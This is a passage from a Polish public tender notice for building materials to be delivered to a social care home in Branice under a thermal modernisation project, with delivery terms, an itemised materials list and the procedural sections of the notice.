jakiekolwiek roszczenia, w tym odszkodowawcze. 7. Zamawiający zastrzega sobie możliwość rezygnacji z niektórych pozycji materiałów z oferty Wykonawcy. Z tytułu rezygnacji z niektórych pozycji materiałów z oferty Wykonawcy, Wykonawcy nie przysługuje jakiekolwiek roszczenia, w tym odszkodowawcze. 8. Zaoferowany przez Wykonawcę asortyment musi spełniać warunki obowiązujących norm oraz posiadać aktualne dokumenty dopuszczające go do użytku zgodnie z obowiązującymi przepisami prawa, a także ma być najwyższej jakości (gat. I, klasa I) pod względem technicznym. Wykonawca na wezwanie Zamawiającego dostarczy niezwłocznie karty charakterystyki, karty techniczne, atesty higieniczne lub inne podobne dokumenty na dostarczane materiały budowlane.9. Wykonawca zobowiązany jest do :-każdorazowej dostawy partii towaru z pozycji oferty od nr 1 do nr 4 w ciągu 50 dni roboczych liczony od dnia złożenia zamówienia e-mailem, faksem lub pisemnie,-każdorazowej dostawy partii towaru z pozycji oferty od nr 5 do nr 56 w ciągu 7 dni roboczych liczony od dnia złożenia zamówienia e-mailem, faksem lub pisemnie. Za dzień roboczy uważa się każdy dzień tygodnia od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy oraz dni wolnych wynikających obowiązujących Zarządzeń w Domu Pomocy Społecznej w Klisinie. 10. Wykonawca zobowiązuje się do sukcesywnego dostarczenia materiałów budowlanych we wskazane miejsce przez Zamawiającego (łącznie z wniesieniem do magazynu Domu Pomocy Społecznej w Klisinie Filia w Branicach). Dowóz przedmiotu zamówienia nastąpi na koszt i ryzyko Wykonawcy do magazynu Domu Pomocy Społecznej w Klisinie Filia w Branicach ul. Szpitalna 18, 48-140 Branice. 11. Dostawy przyjmowane są od poniedziałku do piątku w godz. 7.30 - 14.00 przez magazyn:- DPS w Klisinie filia w Branicach, ul. Szpitalna 18, 48-140 Branice,12. Wykonawca oświadcza i zapewnia, że materiały budowlane będą dostarczane w oryginalnych, czystych opakowaniach producenta zabezpieczających jakość handlową, odpowiadających warunkom transportu, odbioru i przechowywania. 13. Materiały budowlane dostarczane będą w opakowaniach z oznaczeniem fabrycznym tzn. ze wskazaniem rodzaju, nazwy wyrobu, ilości, daty produkcji, terminu przydatności lub terminu minimalnej trwałości, nazwy i adresu producenta oraz będą zawierały inne oznakowania zgodne z obowiązującymi przepisami. Na dostarczane materiały budowlane Wykonawca udzieli gwarancji (minimalny okres gwarancji to 4 miesiące od dnia dostawy).Pozostałe wymogi zawarto w projekcie umowy.Zamawiający informuje, że zgodnie z art. 29 ust. 3 Pzp nazwy materiałów budowlanych, wyposażenia, sprzętu (typ, model, nazwa producenta) użyte w niniejszej dokumentacji przetargowej, dokumentacji technicznej są nazwami pomocniczymi i przykładowymi dla wykonawców. W związku z powyższym zamawiający dopuszcza i/lub równoważne materiały budowlane, wyposażenie, sprzęt, spełniające parametry podanych przykładowo materiałów.Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest zobowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.Materiały budowlane należy dostarczyć do :Dom Pomocy Społecznej w Klisinie Filia w Branicach, ul. Szpitalna 18, 48-140 Branice Sukcesywna dostawa materiałów budowlanych dla Domu Pomocy Społecznej w Klisinie Filia w Branicach w ramach zadania : "Zmniejszenie zużycia energii w Domu Pomocy Społecznej w Klisinie Filia w Branicach poprzez kompleksową termomodernizację, wymianę oświetlenia i montaż pompy ciepła"L.p	Nazwa	Jedn. miary	Ilość1. Płyta rezolowa ze sztywnej piani rezolowej zespolona z płytą kartonowo-gipsową do wewnątrz o lambdzie 0,021 i grubość 90 mm + 12,5 mm współczynnik przewodzenia ciepła [W/(mK)] λD = 0,021, gęstość min. - 35 [kg/m³], odporność na ściskanie (przy 10% odkształcenia)- ≥100 kPa, nasiąkliwość - >90% cel zamkniętych, płyta ze zintegrowaną płytą gips-kartonową, w jednostronnej okładzinie z białego welonu szklanego.	m²	13002. Zaprawa klejowa poliuretanowa do płyt rezolowych-współczynnik przewodności cieplnej – 0,040 W/mK, -przyczepność :* do betonu ≥ 0,3 Mpa,* do styropianu ≥ 0,15 Mpa (rozerwanie w warstwie styropianu),* do cegły ceramicznej ≥ 0,30 Mpa,* do betonu komórkowego ≥ 0,15 Mpa,* do styropianu XPS ≥ 0,20 Mpa,	kg	365 3. Płyta rezolowa ze sztywnej piani rezolowej zespolona z płytą kartonowo-gipsową do wewnątrz o lambdzie 0,021 i grubość 20 mm + 12,5 mm współczynnik przewodzenia ciepła [W/(mK)] λD = 0,021, gęstość min. - 35 [kg/m³], odporność na ściskanie (przy 10% odkształcenia)- ≥100 kPa, nasiąkliwość - >90% cel zamkniętych, płyta ze zintegrowaną płytą gips-kartonową, w jednostronnej okładzinie z białego welonu szklanego.	m²	2704. Parapet konglomerat grubość 2 cmKolor i wzór do ustalenia z Zamawiającym	m²	505. Styropapa 10cm	m²	1086. Impregnat grzybobójczy Preparat do zwalczania grzybów pleśniowych oraz zielonych nalotów, paroprzepuszczalny. Wysoka skuteczność. Nie powodujący zagrożenia dla ludzi i środowiska. Używany wewnątrz i na zewnątrz budynków na podłożach takich jak: powłoki malarskie, tynki, beton itp. Preparat nie powodujący zabrudzeń, nie zawierający metali ciężkich. Baza: roztwór biocydów organicznych. Proporcje mieszania koncentratu: od 2 do 4 l wody na 1 l preparatu. Czas schnięcia: ok. 4 godz. Wyrób musi posiadać atest Państwowego Zakładu Higieny oraz pozwolenie na obrót produktem biobójczym.	l	487. Preparat wzmacniający Preparat wzmacniający gruntGrunt głęboko penetrujący służy do powierzchniowego wzmacniania wszelkich nasiąkliwych podłoży. Właściwości:- wzmacnia powierzchniowo podłoże- zmniejsza nasiąkliwość podłoża- poprawia przyczepność do podłoża- paroprzepuszczalny- ułatwia nanoszenie kolejnych warstw np. klejów, szpachlówek, posadzek, farb. Preparat służy do gruntowania podłoży (ścian, podłóg, sufitów) wewnątrz i na zewnątrz budynków przed mocowaniem płytek ceramicznych, wylewaniem posadzek, mocowaniem wykładzin podłogowych, tapetowaniem, szpachlowaniem, malowaniem czy mocowaniem płyt izolacji termicznej	l	668. Listwa cokołowa szer. 2cm	m	199. Masa uszczelniająca (np. SikaBond)Do wykonywania izolacji przeciwwilgociowych i wodochronnych.Szybkie wiązanie; redukuje hałas i odgłos kroków; wysoka przyczepność do różnych podłoży (także do starych płytek); trwale odporny na działanie wody, mrozu i wysokich temperatur, 1‐składnikowy poliuretan wiążący pod wpływem wilgoci	kg	60010. Kątownik aluminiowy z siatką m	7011. Farba gruntującaFarba zwiększa przyczepność do podłoża, wodoodporna, gotowa do użycia. Ułatwia nakładanie cienkowarstwowych tynków oraz „przecierek” stosowanych na zewnątrz i wewnątrz budynków. Farba do gruntowania warstwy zbrojonej siatką przy ocieplaniu budynków metodą lekką-mokrą w systemach ociepleń oraz do tradycyjnych tynków. Farba do pokrywania powierzchni płyt wiórowych, gipsowo-kartonowych, tynków gipsowych, wszelkich betonów i mocnych powłok malarskich. Zwiększa przyczepność tynków, szpachlówek i farb. Zapobiega powstawaniu plam na kolorowych tynkach akrylowych, mineralnych i silikonowych. Baza: wodna dyspersja żywic syntetycznych z wypełniaczami mineralnymi. Gęstość: ok. 1,5 kg/dm3 . Temperatura stosowania: od +5°C do +25°CCzas schnięcia: ok. 3 godz. Zużycie: od 0,2 do 0,5 l/m2 w zależności od równości i nasiąkliwości podłoża	l.	4512. Klej do płytek Elastyczna zaprawa klejowa przeznaczona do mocowania płytek ceramicznych (glazura, terakota, gres), cementowych i kamiennych na podłożach odkształcalnych (beton, jastrychy i tynki cementowe, cementowo wapienne, beton komórkowy) i nieodkształcalnych zarówno wewnątrz, jak i na zewnątrz budynku.Wysoka przyczepność i elastyczność (klasa S1), stabilność na powierzchniach pionowych (brak spływu). Dane techniczne:- Baza: mieszanka cementów z wypełniaczami mineralnymi i modyfikatorami- Temperatura stosowania: od +5°C do +25°C. Odporność na temperaturę: od -30°C do +70°C.	kg	200013. Tynk z gipsu szpachlowego	kg	400014. Farby emulsyjne (kolor do uzgodnienia z zamawiającym)	l.	57615. Folia polietylenowa	m²	1233 16. Płyty kartonowo gipsowe ognioochronna gr 12,5 mm	m²	117717. Profil do płyt karton gips cd 60*27	m	213018. Profil przyścienny 28/27 do płyt gipsowych	m	45019. Łącznik wzdłużny lw 60/110	szt	42620. Łącznik krzyżowy lk 60/60	szt	170421. Blachowkręty typ 212/25	szt	2073422. Taśma do łączenia płyt karton (flizelinowa)	m	112123. Wełna mineralna skalna płyty 20 cm współczynnik przewodzenia ciepła [W/(mK)]λD = 0,035, gęstość - 45[kg/m³],klasa reakcji na ogień – A1	m²	112124. Gips – mieszanka tynkarska (np. uniflot)	kg	220025. Styropian podłogowy twardy gr 5 cm	m²	30026. Odpływ liniowy 90	szt	527. Pianka montażowa 750ml	szt	1028. Fuga łazienkowa elastyczna kolor do ustalenia z Zamawiającym	kg	5029. Zaprawa tynkarska	kg	60030. Papa termozgrzewalna dwuwarstwowaminimalna grubość 5,2 mm	m2	10831. Płytka posadzkowa łazienkowa gat/klasa I, wym. 30x30antypoślizgowa R11, odporność na ścieranie min IV, mrozoodpornaKolor i wzór do uzgodnienia z Zamawiającym	m2	8032. Płytka ścienna łazienkowa szkliwiona gat/klasa I, wymiar np. 25x40, grubość płytki 5-8mm, kolor i wzór do uzgodnienia z Zamawiającym	m2	15033. Rura kanalizacyjna pcv 110	mb	10034. Rura kanalizacyjna pcv 160	mb	3035. Żarówki LED 13W E27Średnia trwałość znamionowa min. 15000 h, klasa energetyczna min. A+, strumień świetlny 1521 lm, kształt bańki standardowy, barwa biała ciepła	szt	1136. Żarówki LED 6W E27Średnia trwałość znamionowa min. 15000 h, klasa energetyczna min. A, strumień świetlny 470 lm, kształt bańki standardowy, barwa biała ciepła	szt	7337. Żarówki LED 10W E27Średnia trwałość znamionowa min. 15000 h, klasa energetyczna min. A, strumień świetlny 1055 lm, kształt bańki standardowy, barwa biała ciepła	szt	15938. Wyłącznik główny WG – rozłącznik 160A w obudowie izolacyjnej -schemat w załączeniu	szt	139. Tablica bezpiecznikowa TG zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 550x750x200 – 1szt,-rozłącznik DPX I160A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn ventil – 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	140. Tablica bezpiecznikowa T1 zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 4x24 moduły – 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard – 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	141. Tablica bezpiecznikowa T2 zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 4x24 moduły – 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard – 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	142. Tablica bezpiecznikowa T3 zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 4x24 moduły – 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard – 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	143. Tablica bezpiecznikowa T4 zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 4x24 moduły – 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard – 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	144. Tablica bezpiecznikowa TA zbudowana z :-obudowa wnękowa z drzwiczkami metalowymi rozmiaru 3x18 – 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard – 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt 145. Tablica bezpiecznikowa TK zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 2x18 – 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard – 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	146. Rury winidurowe śr. 47 mm m	3947. Przewody izolowane jednożyłowe o przekroju żyły 35mm² wciągane do rur, LgY50	m	9648. Przewody kabelkowe o łącznym przekroju żył do Cu-24/Al.-40 mm²YDY5x10	m	10749. Przewody kabelkowe o łącznym przekroju żył do Cu-24/Al.-40 mm²YDY5x6	m	2250. Przewody kabelkowe o łącznym przekroju żył do Cu-24/Al.-40 mm²YDY5x4	m	5851. Przewody kabelkowe o łącznym przekroju żył do Cu-12/Al.-20 mm²YDY5x2,5	m	3052. Przewody kabelkowe o łącznym przekroju żył do 7,5 mm²YDY2x1,5	m	9053. Przewody instalacji RTV	m	92354. Gniazdo wtyczkowe RTV	szt	4555. Antena telewizyjna zbiorcza	szt	156. Wentylator łazienkowy kanałowy. Wentylator załączany razem z oświetleniem, wentylator z opóźnieniem wyłączenia	szt	161.Przedmiot zamówienia będzie realizowany sukcesywnie w asortymencie i ilościach wynikających z zapotrzebowań składanych bezpośrednio przez Zamawiającego.2. Podane w ofercie ceny będą stałe przez okres trwania umowy z zastrzeżeniem zmiany stawek podatku VAT na podstawie obowiązujących przepisów prawnych w tym zakresie. Zmianie ulegnie kwota podatku VAT, a co za tym idzie cena brutto, natomiast cena netto pozostanie niezmieniona.3. Podana szacunkowa ilość zapotrzebowania na materiały w SIWZ oraz w formularzu ofertowym nie jest ilością stałą, może być zwiększana lub zmniejszana według potrzeb Zamawiającego. 4. Zamawiający może jednostronnie zwiększyć wielkość przedmiotu zamówienia maksymalnie o 30% ogólnej wartości oferty netto Wykonawcy (jeżeli występują pakiety dotyczy to każdego z nich osobno). Z tego względu Wykonawcy nie przysługują wobec Zmawiającego jakiekolwiek roszczenia, w tym odszkodowawcze.5. Zamawiający określa minimalną wielkość przedmiotu zamówienia jaka zostanie zrealizowana na poziomie 30% ogólnej wartości oferty netto Wykonawcy (jeżeli występują pakiety dotyczy to każdego z nich osobno). Z tego względu Wykonawcy nie przysługują wobec Zmawiającego jakiekolwiek roszczenia, w tym odszkodowawcze.6. Zamawiający zastrzega sobie możliwość zwiększania lub zmniejszania ilości zamawianych materiałów w poszczególnych pozycjach oferty Wykonawcy. Z tytułu zwiększania lub zmniejszania ilości zamawianych materiałów Wykonawcy nie przysługuje jakiekolwiek roszczenia, w tym odszkodowawcze. 7. Zamawiający zastrzega sobie możliwość rezygnacji z niektórych pozycji materiałów z oferty Wykonawcy. Z tytułu rezygnacji z niektórych pozycji materiałów z oferty Wykonawcy, Wykonawcy nie przysługuje jakiekolwiek roszczenia, w tym odszkodowawcze. 8. Zaoferowany przez Wykonawcę asortyment musi spełniać warunki obowiązujących norm oraz posiadać aktualne dokumenty dopuszczające go do użytku zgodnie z obowiązującymi przepisami prawa, a także ma być najwyższej jakości (gat. I, klasa I) pod względem technicznym. Wykonawca na wezwanie Zamawiającego dostarczy niezwłocznie karty charakterystyki, karty techniczne, atesty higieniczne lub inne podobne dokumenty na dostarczane materiały budowlane.9. Wykonawca zobowiązany jest do :-każdorazowej dostawy partii towaru z pozycji oferty od nr 1 do nr 4 w ciągu 50 dni roboczych liczony od dnia złożenia zamówienia e-mailem, faksem lub pisemnie,-każdorazowej dostawy partii towaru z pozycji oferty od nr 5 do nr 56 w ciągu 7 dni roboczych liczony od dnia złożenia zamówienia e-mailem, faksem lub pisemnie. Za dzień roboczy uważa się każdy dzień tygodnia od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy oraz dni wolnych wynikających obowiązujących Zarządzeń w Domu Pomocy Społecznej w Klisinie. 10. Wykonawca zobowiązuje się do sukcesywnego dostarczenia materiałów budowlanych we wskazane miejsce przez Zamawiającego (łącznie z wniesieniem do magazynu Domu Pomocy Społecznej w Klisinie Filia w Branicach). Dowóz przedmiotu zamówienia nastąpi na koszt i ryzyko Wykonawcy do magazynu Domu Pomocy Społecznej w Klisinie Filia w Branicach ul. Szpitalna 18, 48-140 Branice. 11. Dostawy przyjmowane są od poniedziałku do piątku w godz. 7.30 - 14.00 przez magazyn:- DPS w Klisinie filia w Branicach, ul. Szpitalna 18, 48-140 Branice,12. Wykonawca oświadcza i zapewnia, że materiały budowlane będą dostarczane w oryginalnych, czystych opakowaniach producenta zabezpieczających jakość handlową, odpowiadających warunkom transportu, odbioru i przechowywania. 13. Materiały budowlane dostarczane będą w opakowaniach z oznaczeniem fabrycznym tzn. ze wskazaniem rodzaju, nazwy wyrobu, ilości, daty produkcji, terminu przydatności lub terminu minimalnej trwałości, nazwy i adresu producenta oraz będą zawierały inne oznakowania zgodne z obowiązującymi przepisami. Na dostarczane materiały budowlane Wykonawca udzieli gwarancji (minimalny okres gwarancji to 4 miesiące od dnia dostawy).Pozostałe wymogi zawarto w projekcie umowy.Zamawiający informuje, że zgodnie z art. 29 ust. 3 Pzp nazwy materiałów budowlanych, wyposażenia, sprzętu (typ, model, nazwa producenta) użyte w niniejszej dokumentacji przetargowej, dokumentacji technicznej są nazwami pomocniczymi i przykładowymi dla wykonawców. W związku z powyższym zamawiający dopuszcza i/lub równoważne materiały budowlane, wyposażenie, sprzęt, spełniające parametry podanych przykładowo materiałów.Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest zobowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.Materiały budowlane należy dostarczyć do :Dom Pomocy Społecznej w Klisinie Filia w Branicach, ul. Szpitalna 18, 48-140 Branice </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">44111000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-07-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 7 do SWIZ.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 7 do SWIZ.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 7 do SWIZ.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.Oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wzór oferty na dostawyJeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp, składane w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">3 500.00 zł</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> 